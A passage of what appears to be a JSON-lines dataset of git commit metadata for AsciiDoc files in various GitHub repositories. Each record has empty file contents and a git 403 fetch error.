ervyShi\/elasticsearch,zkidkid\/elasticsearch,uschindler\/elasticsearch,LeoYao\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,clintongormley\/elasticsearch,kaneshin\/elasticsearch,masaruh\/elasticsearch,socialrank\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,LewayneNaidoo\/elasticsearch,ricardocerq\/elasticsearch,henakamaMSFT\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,palecur\/elasticsearch,dpursehouse\/elasticsearch,dpursehouse\/elasticsearch,Helen-Zhao\/elasticsearch,diendt\/elasticsearch,MaineC\/elasticsearch,JackyMai\/elasticsearch,naveenhooda2000\/elasticsearch,artnowo\/elasticsearch,cwurm\/elasticsearch,markharwood\/elasticsearch,i-am-Nathan\/elasticsearch,StefanGor\/elasticsearch,clintongormley\/elasticsearch,socialrank\/elasticsearch,clintongormley\/elasticsearch,martinstuga\/elasticsearch,JackyMai\/elasticsearch,bawse\/elasticsearch,wangtuo\/elasticsearch,snikch\/elasticsearch,mmaracic\/elasticsearch,wbowling\/elasticsearch,yanjunh\/elasticsearch,alexshadow007\/elasticsearch,obourgain\/elasticsearch,davidvgalbraith\/elasticsearch,socialrank\/elasticsearch,kaneshin\/elasticsearch,sreeramjayan\/elasticsear
ch,myelin\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,yanjunh\/elasticsearch,ZTE-PaaS\/elasticsearch,mohit\/elasticsearch,andrejserafim\/elasticsearch,jbertouch\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,davidvgalbraith\/elasticsearch,girirajsharma\/elasticsearch,diendt\/elasticsearch,zkidkid\/elasticsearch,yynil\/elasticsearch,a2lin\/elasticsearch,socialrank\/elasticsearch,schonfeld\/elasticsearch,ivansun1010\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,jchampion\/elasticsearch,nazarewk\/elasticsearch,njlawton\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,schonfeld\/elasticsearch,scottsom\/elasticsearch,mapr\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,wbowling\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,ivansun1010\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,scottsom\/elasticsearch,jpountz\/elasticsearch,fforbeck\/elasticsearch,mmaracic\/elasticsearch,naveenhooda2000\/elasticsearch,F0lha\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra5-rc,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,sneivandt\/elasticsearch,F0lha\/elasticsearch,MisterAndersen\/elasticsearch,yynil\/elasticsearch,wenpos\/elasticsearch,jpountz\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,JervyShi\/elasticsearch,obourgain\/elasticsearch,markharwood\/elasticsearch,diendt\/elasticsearch,Stacey-Gammon\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,ivansun1010\/elasticsearch,girirajsharma\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,martinstuga\/elasticsearch,nezirus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,AndreKR\/elasticsearch,vroyer\/elassandra,rmuir\/elasticsearch,yynil\/elasticsearch,wangtuo\/elasticsearch,ESamir\/elasticsearch,mapr\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,xuzha\/elasticsearch,yanjunh\/elasticsearch,nazarewk\/elasticsearch,xuzha\/elasticsearch,rhoml\/elasticsearch,ricardocerq\/elasticsearch,yanjunh\/elasticsearch,MaineC\/elasticsearch,awislowski\/elasticsearch,C-Bish\/elasticsearch,artnowo\/elasticsearch,Stacey-Gammon\/elasticsearch,IanvsPoplicola\/elasticsearch,liweinan0423\/elasticsearch,liweinan0423\/elasticsearch,glefloch\/elasticsearch,Shepard1212\/elasticsearch,markharwood\/elasticsearch,Helen-Zhao\/elasticsearch,wbowling\/elasticsearch,wangtuo\/elasticsearch,fred84\/elasticsearch,shreejay\/elasticsearch,rhoml\/elasticsearch,robin13\/elasticsearch,AndreKR\/elasticsearch,xuzha\/elasticsearch,elasticdog\/elasticsearch,yynil\/elasticsearch,markwalkom\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra5-rc,JackyMai\/elasticsearch,rhoml\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,rmuir\/elasticsearch,wuranbo\/elasticsearch,fernandozhu\/elasticsearch,strapdata\/elassandra,mohit\/elasticsearch,episerver\/elasticsearch,LeoYao\/elasticsearch,rhoml\/elasticsearch,kaneshin\/elasticsearch,palecur\/elasticsearch,Helen-Zhao\/elasticsearch,avikurapati\/elasticsearch,ricardocerq\/elasticsearch,mmaracic\/elasticsearch,myelin\/elasticsearch,trangvh\/elasticsearch,HonzaKral\/elasticsearch,schonfeld\/elasticsearch,jchampion\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,schonfeld\/elasticsearch,kalimatas\/elasticsearch,s1monw\/elasticsearch,MisterAndersen\/elasticsearch,lks21c\/elasticsearch,
ivansun1010\/elasticsearch,nomoa\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,martinstuga\/elasticsearch,ivansun1010\/elasticsearch,AndreKR\/elasticsearch,tebriel\/elasticsearch,coding0011\/elasticsearch,sreeramjayan\/elasticsearch,dongjoon-hyun\/elasticsearch,fforbeck\/elasticsearch,girirajsharma\/elasticsearch,jbertouch\/elasticsearch,naveenhooda2000\/elasticsearch,palecur\/elasticsearch,winstonewert\/elasticsearch,rlugojr\/elasticsearch,geidies\/elasticsearch,artnowo\/elasticsearch,bawse\/elasticsearch,xuzha\/elasticsearch,spiegela\/elasticsearch,drewr\/elasticsearch,gmarz\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra5-rc,wbowling\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,avikurapati\/elasticsearch,GlenRSmith\/elasticsearch,davidvgalbraith\/elasticsearch,ESamir\/elasticsearch,davidvgalbraith\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,trangvh\/elasticsearch,awislowski\/elasticsearch,nomoa\/elasticsearch,lks21c\/elasticsearch,wuranbo\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wbowling\/elasticsearch,mmaracic\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,jprante\/elasticsearch,sneivandt\/elasticsearch,henakamaMSFT\/elasticsearch,scottsom\/elasticsearch,polyfractal\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,Helen-Zhao\/elasticsearch,kaneshin\/elasticsearch,andrejserafim\/elasticsearch,martinstuga\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,liweinan0423\/elasticsearch,mikemccand\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,njlawton\/elasticsearch,gfyoung\/elasticsearch,camilojd\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jimczi\/elasticsearch,snikch\/elasticsearch,fred84\/elasticsearch,Shepard1212\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,trangvh\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,mapr\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,dpursehouse\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,diendt\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,bawse\/elasticsearch,scottsom\/elasticsearch,henakamaMSFT\/elasticsearch,sneivandt\/elasticsearch,Shepard1212\/elasticsearch,F0lha\/elasticsearch,andrejserafim\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,girirajsharma\/elasticsearch,mmaracic\/elasticsearch,clintongormley\/elasticsearch,cwurm\/elasticsearch,C-Bish\/elasticsearch,MisterAndersen\/elasticsearch,nezirus\/elasticsearch,vroyer\/elasticassandra,nilabhsagar\/elasticsearch,gfyoung\/elasticsearch,andrejserafim\/elasticsearch,F0lha\/elasticsearch,ZTE-PaaS\/elasticsearch,jpountz\/elasticsearch,JervyShi\/elasticsearch,davidvgalbraith\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,gmarz\/elasticsearch,ESamir\/elasticsearch,fforbeck\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,markharwood\/elasticsearch,artnowo\/elasticsearch,AndreKR\/elasticsearch,JervyShi\/elasticsearch,
maddin2016\/elasticsearch,camilojd\/elasticsearch,gmarz\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sreeramjayan\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elassandra,MisterAndersen\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,polyfractal\/elasticsearch,ricardocerq\/elasticsearch,tebriel\/elasticsearch,schonfeld\/elasticsearch,a2lin\/elasticsearch,coding0011\/elasticsearch,girirajsharma\/elasticsearch,wenpos\/elasticsearch,ESamir\/elasticsearch,njlawton\/elasticsearch,mmaracic\/elasticsearch,Shepard1212\/elasticsearch,lks21c\/elasticsearch,jbertouch\/elasticsearch,mikemccand\/elasticsearch,mapr\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ESamir\/elasticsearch,ivansun1010\/elasticsearch,AndreKR\/elasticsearch,HonzaKral\/elasticsearch,Shepard1212\/elasticsearch,drewr\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,mapr\/elasticsearch,henakamaMSFT\/elasticsearch,drewr\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,nomoa\/elasticsearch,drewr\/elasticsearch,mortonsykes\/elasticsearch,glefloch\/elasticsearch,dongjoon-hyun\/elasticsearch,geidies\/elasticsearch,wuranbo\/elasticsearch,jprante\/elasticsearch,trangvh\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,awislowski\/elasticsearch,winstonewert\/elasticsearch","old_file":"docs\/plugins\/security.asciidoc","new_file":"docs\/plugins\/security.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a58a949af453d4b58d9221aeb4d514732eefb00","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e185af9d1d56ceb124616b80a8aa9c7abd269c8","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee.io,Laurie-Maurer\/gravitee.io,gravitee-io\/gravitee.io,Laurie-Maurer\/gravitee.io,gravitee-io\/gravitee.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Laurie-Maurer\/gravitee.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5d8749f11a347469208252513d1850fa9225171a","subject":"y2b create post BenQ Joybee GP2 - Media Monster","message":"y2b create post BenQ Joybee GP2 - Media Monster","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-01-BenQ-Joybee-GP2--Media-Monster.adoc","new_file":"_posts\/2012-01-01-BenQ-Joybee-GP2--Media-Monster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89f2f32636d5f6b3323516a1882d277c9e81195c","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 
2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fca50ca9cfad9b8cae0338c214ed37213aff2f96","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"840721b6aa92073fa88d747a040386bbd1721336","subject":"Publish 2015-5-10-uGui.adoc","message":"Publish 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGui.adoc","new_file":"2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be9d47a9c313171911d803a6498e69540db16376","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddb87db76557e6c4ac45859018e5fe0663260794","subject":"CL note: write binary","message":"CL note: write binary\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"40c9306bf1ba05c9d9fcaf7fdb7e69185b849ee4","subject":"Update 2013-02-14-Alguem-com-senso-de-humor-Bill-Gates.adoc","message":"Update 2013-02-14-Alguem-com-senso-de-humor-Bill-Gates.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2013-02-14-Alguem-com-senso-de-humor-Bill-Gates.adoc","new_file":"_posts\/2013-02-14-Alguem-com-senso-de-humor-Bill-Gates.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92c40f1563e12e7dd75e048d5628fb903196bef6","subject":"Update 2017-02-07-docker-compose-best-practices-part-1.adoc","message":"Update 2017-02-07-docker-compose-best-practices-part-1.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-docker-compose-best-practices-part-1.adoc","new_file":"_posts\/2017-02-07-docker-compose-best-practices-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c12f17f9225dbe02bf1ed78f8347815ee2eeb551","subject":"Update 2015-06-01-Weiter-gehts-Die-Story-II.adoc","message":"Update 2015-06-01-Weiter-gehts-Die-Story-II.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-01-Weiter-gehts-Die-Story-II.adoc","new_file":"_posts\/2015-06-01-Weiter-gehts-Die-Story-II.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c1347cf95bc0ac282e867d85fb857699e9b1484","subject":"job: #11444 Introducing analysis note documenting the import of SWATS models and the challenges faced to get a clean load.","message":"job: #11444 Introducing analysis note documenting the import of SWATS models and the challenges faced to get a clean load.\n","repos":"xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,leviathan747\/mc,leviathan747\/mc","old_file":"doc\/notes\/11444_wasl\/11444_wasl_import_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11444_wasl_import_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f70adfc620d10bef2d41b01c7e91638ba5b9141","subject":"Link in repo URL","message":"Link in repo URL\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efb01536389965e473687ce0762d28eef8342e10","subject":"Update 2018-07-19-Keeping-a-blockchain-decentralised.adoc","message":"Update 
2018-07-19-Keeping-a-blockchain-decentralised.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-19-Keeping-a-blockchain-decentralised.adoc","new_file":"_posts\/2018-07-19-Keeping-a-blockchain-decentralised.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6198a1ed13f4d4ba78cf37000f427e727274382","subject":"Update 2018-08-10-Markdown-for-Interactive-Fiction.adoc","message":"Update 2018-08-10-Markdown-for-Interactive-Fiction.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2018-08-10-Markdown-for-Interactive-Fiction.adoc","new_file":"_posts\/2018-08-10-Markdown-for-Interactive-Fiction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1b3b90b04b5d166646e50085de0d603e9313b44","subject":"Update 2015-10-17-Importing-data-from-DBF-files-in-C.adoc","message":"Update 2015-10-17-Importing-data-from-DBF-files-in-C.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Importing-data-from-DBF-files-in-C.adoc","new_file":"_posts\/2015-10-17-Importing-data-from-DBF-files-in-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b29f53d97b4f0eed78404a31329d157d287118be","subject":"y2b create post You've Never Seen A Lamp Do This...","message":"y2b create post You've Never Seen A Lamp Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-03-Youve-Never-Seen-A-Lamp-Do-This.adoc","new_file":"_posts\/2017-05-03-Youve-Never-Seen-A-Lamp-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"771567c6b3514dbb31b14989ebe0d06b18fd4732","subject":"y2b create post How terrible is a $58 smartphone?","message":"y2b create post How terrible is a $58 smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-05-How-terrible-is-a-58-smartphone.adoc","new_file":"_posts\/2017-11-05-How-terrible-is-a-58-smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17202a13222ea4b4607cbbfa75a523ca8745ef81","subject":"y2b create post Top 5 SUPER WTF items on Amazon!","message":"y2b create post Top 5 SUPER WTF items on 
Amazon!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-08-05-Top-5-SUPER-WTF-items-on-Amazon.adoc","new_file":"_posts\/2013-08-05-Top-5-SUPER-WTF-items-on-Amazon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d381424d152d0bc248241cc6cc428cb8fff7ac7","subject":"Update 2015-04-18-Update-Whats-new-in-Version-030.adoc","message":"Update 2015-04-18-Update-Whats-new-in-Version-030.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2015-04-18-Update-Whats-new-in-Version-030.adoc","new_file":"_posts\/2015-04-18-Update-Whats-new-in-Version-030.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a28095475b0eeacf7f522f9d2dc896ee9417ace0","subject":"Update 2015-09-10-Mytitle.adoc","message":"Update 2015-09-10-Mytitle.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Mytitle.adoc","new_file":"_posts\/2015-09-10-Mytitle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16c6446a1c6bb08019183fcaeaee4c3b3294446d","subject":"Delete 2016-02-26-One-Two.adoc","message":"Delete 2016-02-26-One-Two.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-One-Two.adoc","new_file":"_posts\/2016-02-26-One-Two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c6f1ec4f6cd7185c8c65d48d07b56e15d0c424","subject":"Update 2016-08-24-Welcome.adoc","message":"Update 2016-08-24-Welcome.adoc","repos":"maurodx\/maurodx.github.io,maurodx\/maurodx.github.io,maurodx\/maurodx.github.io,maurodx\/maurodx.github.io","old_file":"_posts\/2016-08-24-Welcome.adoc","new_file":"_posts\/2016-08-24-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/maurodx\/maurodx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5869b8ce1ea01bcfce5f4aa6f5f3a68b0931d9f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bca3bad2e5103988d24ad0bf3d71bc323ec14a0","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79f97b4408b7d039c15ab903ba0058eba1c6e521","subject":"Update 2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","message":"Update 2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","new_file":"_posts\/2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"169fd53976ffaa4a089fa0eef0512c30b8b5b2fb","subject":"Fix typo","message":"Fix typo\n\nCloses gh-4515\n","repos":"rweisleder\/spring-boot,jbovet\/spring-boot,ameraljovic\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,bbrouwer\/spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,SaravananParthasarathy\/SPSDemo,deki\/spring-boot,sebastiankirsch\/spring-boot,javyzheng\/spring-boot,brettwooldridge\/spring-boot,NetoDevel\/spring-boot,jxblum\/spring-boot,jmnarloch\/spring-boot,pvorb\/spring-boot,chrylis\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,michael-simons\/spring-boot,bijukunjummen\/spring-boot,lburgazzoli\/spring-boot,ilayaperumalg\/spring-boot,drumonii\/spring-boot,bijukunjummen\/spring-boot,chrylis\/spring-boot,dfa1\/spring-boot,sbuettner\/spring-boot,lenicliu\/spring-boot,xiaoleiPENG\/my-project,mdeinum\/spring-boot,thomasdarimont\/spring-boot,vpavic\/spring-boot,dfa1\/spring-boot,yhj630520\/sp